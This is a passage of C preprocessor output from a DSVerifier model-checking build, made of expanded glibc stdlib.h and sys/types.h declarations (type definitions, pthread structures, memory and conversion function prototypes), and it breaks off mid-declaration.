# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h"
# 1 "/usr/include/stdlib.h" 1 3 4
# 25 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 3 4
# 1 "/usr/include/features.h" 1 3 4
# 461 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 1 3 4
# 452 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 453 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 454 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 462 "/usr/include/features.h" 2 3 4
# 485 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h" 1 3 4
# 11 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 2 3 4
# 486 "/usr/include/features.h" 2 3 4
# 34 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 2 3 4
# 26 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
# 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
typedef long unsigned int size_t;
# 321 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4
typedef int wchar_t;
# 32 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 1 3 4
# 52 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 3 4
typedef enum
{
P_ALL,
P_PID,
P_PGID
} idtype_t;
# 40 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitstatus.h" 1 3 4
# 41 "/usr/include/stdlib.h" 2 3 4
# 55 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 1 3 4
# 120 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 25 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 2 3 4
# 121 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 2 3 4
# 56 "/usr/include/stdlib.h" 2 3 4
typedef struct
{
int quot;
int rem;
} div_t;
typedef struct
{
long int quot;
long int rem;
} ldiv_t;
__extension__ typedef struct
{
long long int quot;
long long int rem;
} lldiv_t;
# 97 "/usr/include/stdlib.h" 3 4
extern size_t __ctype_get_mb_cur_max (void) __attribute__ ((__nothrow__ , __leaf__)) ;
extern double atof (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern int atoi (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern long int atol (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
__extension__ extern long long int atoll (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern double strtod (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern float strtof (const char *__restrict __nptr,
char **__restrict __endptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long double strtold (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 176 "/usr/include/stdlib.h" 3 4
extern long int strtol (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern unsigned long int strtoul (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtouq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoll (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtoull (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 385 "/usr/include/stdlib.h" 3 4
extern char *l64a (long int __n) __attribute__ ((__nothrow__ , __leaf__)) ;
extern long int a64l (const char *__s)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
# 1 "/usr/include/x86_64-linux-gnu/sys/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 28 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/timesize.h" 1 3 4
# 29 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned char __u_char;
typedef unsigned short int __u_short;
typedef unsigned int __u_int;
typedef unsigned long int __u_long;
typedef signed char __int8_t;
typedef unsigned char __uint8_t;
typedef signed short int __int16_t;
typedef unsigned short int __uint16_t;
typedef signed int __int32_t;
typedef unsigned int __uint32_t;
typedef signed long int __int64_t;
typedef unsigned long int __uint64_t;
typedef __int8_t __int_least8_t;
typedef __uint8_t __uint_least8_t;
typedef __int16_t __int_least16_t;
typedef __uint16_t __uint_least16_t;
typedef __int32_t __int_least32_t;
typedef __uint32_t __uint_least32_t;
typedef __int64_t __int_least64_t;
typedef __uint64_t __uint_least64_t;
typedef long int __quad_t;
typedef unsigned long int __u_quad_t;
typedef long int __intmax_t;
typedef unsigned long int __uintmax_t;
# 141 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/typesizes.h" 1 3 4
# 142 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/time64.h" 1 3 4
# 143 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned long int __dev_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef unsigned long int __ino_t;
typedef unsigned long int __ino64_t;
typedef unsigned int __mode_t;
typedef unsigned long int __nlink_t;
typedef long int __off_t;
typedef long int __off64_t;
typedef int __pid_t;
typedef struct { int __val[2]; } __fsid_t;
typedef long int __clock_t;
typedef unsigned long int __rlim_t;
typedef unsigned long int __rlim64_t;
typedef unsigned int __id_t;
typedef long int __time_t;
typedef unsigned int __useconds_t;
typedef long int __suseconds_t;
typedef int __daddr_t;
typedef int __key_t;
typedef int __clockid_t;
typedef void * __timer_t;
typedef long int __blksize_t;
typedef long int __blkcnt_t;
typedef long int __blkcnt64_t;
typedef unsigned long int __fsblkcnt_t;
typedef unsigned long int __fsblkcnt64_t;
typedef unsigned long int __fsfilcnt_t;
typedef unsigned long int __fsfilcnt64_t;
typedef long int __fsword_t;
typedef long int __ssize_t;
typedef long int __syscall_slong_t;
typedef unsigned long int __syscall_ulong_t;
typedef __off64_t __loff_t;
typedef char *__caddr_t;
typedef long int __intptr_t;
typedef unsigned int __socklen_t;
typedef int __sig_atomic_t;
# 30 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __u_char u_char;
typedef __u_short u_short;
typedef __u_int u_int;
typedef __u_long u_long;
typedef __quad_t quad_t;
typedef __u_quad_t u_quad_t;
typedef __fsid_t fsid_t;
typedef __loff_t loff_t;
typedef __ino_t ino_t;
# 59 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
typedef __dev_t dev_t;
typedef __gid_t gid_t;
typedef __mode_t mode_t;
typedef __nlink_t nlink_t;
typedef __uid_t uid_t;
typedef __off_t off_t;
# 97 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
typedef __pid_t pid_t;
typedef __id_t id_t;
typedef __ssize_t ssize_t;
typedef __daddr_t daddr_t;
typedef __caddr_t caddr_t;
typedef __key_t key_t;
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clock_t.h" 1 3 4
typedef __clock_t clock_t;
# 127 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clockid_t.h" 1 3 4
typedef __clockid_t clockid_t;
# 129 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/time_t.h" 1 3 4
typedef __time_t time_t;
# 130 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/timer_t.h" 1 3 4
typedef __timer_t timer_t;
# 131 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 144 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 145 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef unsigned long int ulong;
typedef unsigned short int ushort;
typedef unsigned int uint;
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 3 4
typedef __int8_t int8_t;
typedef __int16_t int16_t;
typedef __int32_t int32_t;
typedef __int64_t int64_t;
# 156 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __uint8_t u_int8_t;
typedef __uint16_t u_int16_t;
typedef __uint32_t u_int32_t;
typedef __uint64_t u_int64_t;
typedef int register_t __attribute__ ((__mode__ (__word__)));
# 176 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/endian.h" 1 3 4
# 24 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endian.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endianness.h" 1 3 4
# 36 "/usr/include/x86_64-linux-gnu/bits/endian.h" 2 3 4
# 25 "/usr/include/endian.h" 2 3 4
# 35 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
static __inline __uint16_t
__bswap_16 (__uint16_t __bsx)
{
return __builtin_bswap16 (__bsx);
}
static __inline __uint32_t
__bswap_32 (__uint32_t __bsx)
{
return __builtin_bswap32 (__bsx);
}
# 69 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
__extension__ static __inline __uint64_t
__bswap_64 (__uint64_t __bsx)
{
return __builtin_bswap64 (__bsx);
}
# 36 "/usr/include/endian.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 1 3 4
# 32 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 3 4
static __inline __uint16_t
__uint16_identity (__uint16_t __x)
{
return __x;
}
static __inline __uint32_t
__uint32_identity (__uint32_t __x)
{
return __x;
}
static __inline __uint64_t
__uint64_identity (__uint64_t __x)
{
return __x;
}
# 37 "/usr/include/endian.h" 2 3 4
# 177 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/select.h" 1 3 4
# 30 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/select.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/select.h" 2 3 4
# 31 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h" 1 3 4
typedef struct
{
unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))];
} __sigset_t;
# 5 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 2 3 4
typedef __sigset_t sigset_t;
# 34 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timeval.h" 1 3 4
struct timeval
{
__time_t tv_sec;
__suseconds_t tv_usec;
};
# 38 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
struct timespec
{
__time_t tv_sec;
__syscall_slong_t tv_nsec;
# 26 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
};
# 40 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
typedef __suseconds_t suseconds_t;
typedef long int __fd_mask;
# 59 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
typedef struct
{
__fd_mask __fds_bits[1024 / (8 * (int) sizeof (__fd_mask))];
} fd_set;
typedef __fd_mask fd_mask;
# 91 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 101 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int select (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
struct timeval *__restrict __timeout);
# 113 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int pselect (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
const struct timespec *__restrict __timeout,
const __sigset_t *__restrict __sigmask);
# 126 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 180 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __blksize_t blksize_t;
typedef __blkcnt_t blkcnt_t;
typedef __fsblkcnt_t fsblkcnt_t;
typedef __fsfilcnt_t fsfilcnt_t;
# 227 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 1 3 4
# 44 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 1 3 4
# 21 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 2 3 4
# 45 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
typedef struct __pthread_internal_list
{
struct __pthread_internal_list *__prev;
struct __pthread_internal_list *__next;
} __pthread_list_t;
typedef struct __pthread_internal_slist
{
struct __pthread_internal_slist *__next;
} __pthread_slist_t;
# 74 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
struct __pthread_mutex_s
{
int __lock;
unsigned int __count;
int __owner;
unsigned int __nusers;
int __kind;
short __spins;
short __elision;
__pthread_list_t __list;
# 53 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
};
# 75 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
# 87 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
struct __pthread_rwlock_arch_t
{
unsigned int __readers;
unsigned int __writers;
unsigned int __wrphase_futex;
unsigned int __writers_futex;
unsigned int __pad3;
unsigned int __pad4;
int __cur_writer;
int __shared;
signed char __rwelision;
unsigned char __pad1[7];
unsigned long int __pad2;
unsigned int __flags;
# 55 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
};
# 88 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
struct __pthread_cond_s
{
__extension__ union
{
__extension__ unsigned long long int __wseq;
struct
{
unsigned int __low;
unsigned int __high;
} __wseq32;
};
__extension__ union
{
__extension__ unsigned long long int __g1_start;
struct
{
unsigned int __low;
unsigned int __high;
} __g1_start32;
};
unsigned int __g_refs[2] ;
unsigned int __g_size[2];
unsigned int __g1_orig_size;
unsigned int __wrefs;
unsigned int __g_signals[2];
};
# 24 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 2 3 4
typedef unsigned long int pthread_t;
typedef union
{
char __size[4];
int __align;
} pthread_mutexattr_t;
typedef union
{
char __size[4];
int __align;
} pthread_condattr_t;
typedef unsigned int pthread_key_t;
typedef int pthread_once_t;
union pthread_attr_t
{
char __size[56];
long int __align;
};
typedef union pthread_attr_t pthread_attr_t;
typedef union
{
struct __pthread_mutex_s __data;
char __size[40];
long int __align;
} pthread_mutex_t;
typedef union
{
struct __pthread_cond_s __data;
char __size[48];
__extension__ long long int __align;
} pthread_cond_t;
typedef union
{
struct __pthread_rwlock_arch_t __data;
char __size[56];
long int __align;
} pthread_rwlock_t;
typedef union
{
char __size[8];
long int __align;
} pthread_rwlockattr_t;
typedef volatile int pthread_spinlock_t;
typedef union
{
char __size[32];
long int __align;
} pthread_barrier_t;
typedef union
{
char __size[4];
int __align;
} pthread_barrierattr_t;
# 228 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 395 "/usr/include/stdlib.h" 2 3 4
extern long int random (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srandom (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern char *initstate (unsigned int __seed, char *__statebuf,
size_t __statelen) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern char *setstate (char *__statebuf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct random_data
{
int32_t *fptr;
int32_t *rptr;
int32_t *state;
int rand_type;
int rand_deg;
int rand_sep;
int32_t *end_ptr;
};
extern int random_r (struct random_data *__restrict __buf,
int32_t *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srandom_r (unsigned int __seed, struct random_data *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int initstate_r (unsigned int __seed, char *__restrict __statebuf,
size_t __statelen,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 4)));
extern int setstate_r (char *__restrict __statebuf,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int rand (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srand (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern int rand_r (unsigned int *__seed) __attribute__ ((__nothrow__ , __leaf__));
extern double drand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern double erand48 (unsigned short int __xsubi[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int lrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int nrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int mrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int jrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void srand48 (long int __seedval) __attribute__ ((__nothrow__ , __leaf__));
extern unsigned short int *seed48 (unsigned short int __seed16v[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void lcong48 (unsigned short int __param[7]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct drand48_data
{
unsigned short int __x[3];
unsigned short int __old_x[3];
unsigned short int __c;
unsigned short int __init;
__extension__ unsigned long long int __a;
};
extern int drand48_r (struct drand48_data *__restrict __buffer,
double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int erand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int nrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int mrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int jrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srand48_r (long int __seedval, struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int seed48_r (unsigned short int __seed16v[3],
struct drand48_data *__buffer) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lcong48_r (unsigned short int __param[7],
struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *malloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern void *calloc (size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (1, 2))) ;
extern void *realloc (void *__ptr, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__)) __attribute__ ((__alloc_size__ (2)));
extern void *reallocarray (void *__ptr, size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__))
__attribute__ ((__alloc_size__ (2, 3)));
extern void free (void *__ptr) __attribute__ ((__nothrow__ , __leaf__));
# 1 "/usr/include/alloca.h" 1 3 4
# 24 "/usr/include/alloca.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4
# 25 "/usr/include/alloca.h" 2 3 4
extern void *alloca (size_t __size) __attribute__ ((__nothrow__ , __leaf__));
# 569 "/usr/include/stdlib.h" 2 3 4
extern void *valloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern int posix_memalign (void **__memptr, size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern void *aligned_alloc (size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (2))) ;
extern void abort (void) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern int atexit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int at_quick_exit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int on_exit (void (*__func) (int __status, void *__arg), void *__arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void quick_exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void _Exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern char *getenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 647 "/usr/include/stdlib.h" 3 4
extern int putenv (char *__string) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int setenv (const char *__name, const char *__value, int __replace)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int unsetenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int clearenv (void) __attribute__ ((__nothrow__ , __leaf__));
# 675 "/usr/include/stdlib.h" 3 4
extern char *mktemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 688 "/usr/include/stdlib.h" 3 4
extern int mkstemp (char *__template) __attribute__ ((__nonnull__ (1))) ;
# 710 "/usr/include/stdlib.h" 3 4
extern int mkstemps (char *__template, int __suffixlen) __attribute__ ((__nonnull__ (1))) ;
# 731 "/usr/include/stdlib.h" 3 4
extern char *mkdtemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 784 "/usr/include/stdlib.h" 3 4
extern int system (const char *__command) ;
# 800 "/usr/include/stdlib.h" 3 4
extern char *realpath (const char *__restrict __name,
char *__restrict __resolved) __attribute__ ((__nothrow__ , __leaf__)) ;
typedef int (*__compar_fn_t) (const void *, const void *);
# 820 "/usr/include/stdlib.h" 3 4
extern void *bsearch (const void *__key, const void *__base,
size_t __nmemb, size_t __size, __compar_fn_t __compar)
__attribute__ ((__nonnull__ (1, 2, 5))) ;
extern void qsort (void *__base, size_t __nmemb, size_t __size,
__compar_fn_t __compar) __attribute__ ((__nonnull__ (1, 4)));
# 840 "/usr/include/stdlib.h" 3 4
extern int abs (int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern long int labs (long int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern long long int llabs (long long int __x)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern div_t div (int __numer, int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern ldiv_t ldiv (long int __numer, long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern lldiv_t lldiv (long long int __numer,
long long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
# 872 "/usr/include/stdlib.h" 3 4
extern char *ecvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *fcvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *gcvt (double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern char *qecvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qfcvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qgcvt (long double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern int ecvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int fcvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
